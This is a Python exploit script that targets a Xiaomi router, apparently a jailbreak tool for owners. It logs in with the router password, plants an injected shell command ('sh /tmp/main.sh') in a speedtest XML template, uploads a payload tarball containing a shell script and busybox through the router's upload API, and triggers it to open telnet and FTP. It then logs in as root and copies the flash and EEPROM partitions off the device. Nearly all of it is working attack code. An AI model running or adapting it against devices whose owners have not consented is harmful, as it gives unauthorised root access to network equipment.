import os
import sys
import re
import time
import base64
import random
import hashlib
import requests
import socket
import subprocess
import tarfile
import ftplib
import telnetlib
# proxies = {"http":"http://127.0.0.1:8080"}
proxies = {}
command = "((sh /tmp/main.sh) &)"
line4 = subprocess.check_output(["cmd","/c","chcp","437","&","tracert","-d","-h","1","1.1.1.1"]).decode().split("\r\n")[4].strip().split(" ")
for data in line4:
if len(data.split(".")) == 4:
router_ip_address = data
break
def get_mac():
try:
r0 = requests.get("http://{router_ip_address}/cgi-bin/luci/web".format(router_ip_address=router_ip_address), proxies=proxies)
except:
print ('No Xiaomi Router found ... Check the router performance and try again.')
sys.exit(1)
mac = re.findall(r'deviceId = \'(.*?)\'', r0.text)[0]
return mac
def create_nonce(mac):
type_ = 0
deviceId = mac
time_ = int(time.time())
rand = random.randint(0,10000)
return "%d_%s_%d_%d"%(type_, deviceId, time_, rand)
def calc_password(nonce, account_str):
m = hashlib.sha1()
m.update((nonce + account_str).encode('utf-8'))
return m.hexdigest()
mac = get_mac()
nonce = create_nonce(mac)
account_str = calc_password(input("Enter your router password: "), 'a2ffa5c9be07488bbb04a3a47d3c5f6a')
password = calc_password(nonce, account_str)
data = "username=admin&password={password}&logtype=2&nonce={nonce}".format(password=password,nonce=nonce)
r2 = requests.post("http://{router_ip_address}/cgi-bin/luci/api/xqsystem/login".format(router_ip_address=router_ip_address),
data = data,
headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"},
proxies=proxies)
stok = re.findall(r'"token":"(.*?)"',r2.text)[0]
with open("template/speedtest_urls_template.xml","rt") as f:
template = f.read()
data = template.format(router_ip_address=router_ip_address,command=command)
with open("main/speedtest_urls.xml",'wt',newline='\n') as f:
f.write(data)
with tarfile.open("main/payload.tar.gz", "w:gz") as tar:
tar.add("main/speedtest_urls.xml", "speedtest_urls.xml")
tar.add("main/main.sh", "main.sh")
tar.add("main/busybox", "busybox")
os.remove("main/speedtest_urls.xml")
print("Uploading the exploit...")
r3 = requests.post("http://{router_ip_address}/cgi-bin/luci/;stok={stok}/api/misystem/c_upload".format(router_ip_address=router_ip_address,stok=stok), files={"image":open("main/payload.tar.gz",'rb')}, proxies=proxies)
os.remove("main/payload.tar.gz")
print("Enabling telnet and ftpd...")
r4 = requests.get("http://{router_ip_address}/cgi-bin/luci/;stok={stok}/api/xqnetdetect/netspeed".format(router_ip_address=router_ip_address,stok=stok), proxies=proxies)
print("Successfully!")
print('Creating a backup...')
tn = telnetlib.Telnet(router_ip_address)
tn.read_until(b"login:")
tn.write(b"root\n")
tn.read_until(b"root@XiaoQiang:~#")
tn.write(b"dd if=/dev/mtd0 of=/tmp/backup.bin\n")
tn.read_until(b"root@XiaoQiang:~#")
ftp=ftplib.FTP(router_ip_address)
with open('data/backup.bin', 'wb') as file:
ftp.retrbinary(f'RETR /tmp/backup.bin', file.write)
tn.write(b"rm /tmp/backup.bin\n")
tn.read_until(b"root@XiaoQiang:~#")
print('Backup created!')
print('backup eeprom...')
tn = telnetlib.Telnet(router_ip_address)
tn.read_until(b"login:")
tn.write(b"root\n")
tn.read_until(b"root@XiaoQiang:~#")
tn.write(b"dd if=/dev/mtd3 of=/tmp/eeprom.bin\n")
tn.read_until(b"root@XiaoQiang:~#")
ftp=ftplib.FTP(router_ip_address)
with open('data/eeprom.bin', 'wb') as file:
ftp.retrbinary(f'RETR /tmp/eeprom.bin', file.write)
tn.write(b"rm /tmp/eeprom.bin\n")
tn.read_until(b"root@XiaoQiang:~#")
print('eeprom backuped!')
